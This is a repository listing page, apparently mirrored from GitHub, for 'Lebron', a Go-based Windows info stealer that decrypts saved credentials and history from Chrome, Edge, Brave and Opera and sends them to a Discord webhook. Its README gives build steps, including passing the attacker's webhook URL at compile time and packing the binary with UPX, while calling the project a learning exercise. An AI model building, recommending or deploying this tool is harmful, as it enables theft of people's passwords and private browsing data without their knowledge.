https://github.com/komodoooo/lebron
Chromium-based info stealer, sends credentials via a discord webhook
https://github.com/komodoooo/lebron
chromium-stealer info-stealer password-decryption password-recovery password-stealer
Last synced: 7 months ago
JSON representation
Chromium-based info stealer, sends credentials via a discord webhook
- Host: GitHub
- URL: https://github.com/komodoooo/lebron
- Owner: komodoooo
- License: unlicense
- Created: 2024-05-05T19:00:13.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2024-05-06T10:35:19.000Z (over 1 year ago)
- Last Synced: 2024-05-06T20:21:22.707Z (over 1 year ago)
- Topics: chromium-stealer, info-stealer, password-decryption, password-recovery, password-stealer
- Language: Go
- Homepage:
- Size: 7.81 KB
- Stars: 2
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Lebron
A Chromium-based info stealer for windows, sends credentials & history via a discord webhook
The program currently supports the following broswers:
* Chrome
* Edge
* Brave
* Opera / GX###### * only the stable versions of these broswers are actually supported
# Compile
1. **Requirements**
Ensure the following tools are installed on your Windows machine:
- `go`
- `make`
- `upx`You can use [Scoop](https://scoop.sh) for easy installation of these dependencies.
2. **Set Up Dependencies**
Run the following command to set up the required dependencies:
`make setup`
3. **Build and Compress**
Compile and compress the executable with the following command:
`make build WEBHOOK="YOUR_DISCORD_WEBHOOK"`
You can also set the compression level with `COMPRESSION_LEVEL` (1-9, default: 7)
5. **Clean Up**
Once the build is complete, you can remove temporary files with:
`make clean`## Notes
I based myself on various detailed reads i found online.
I just wrote this for learning & fun purposes.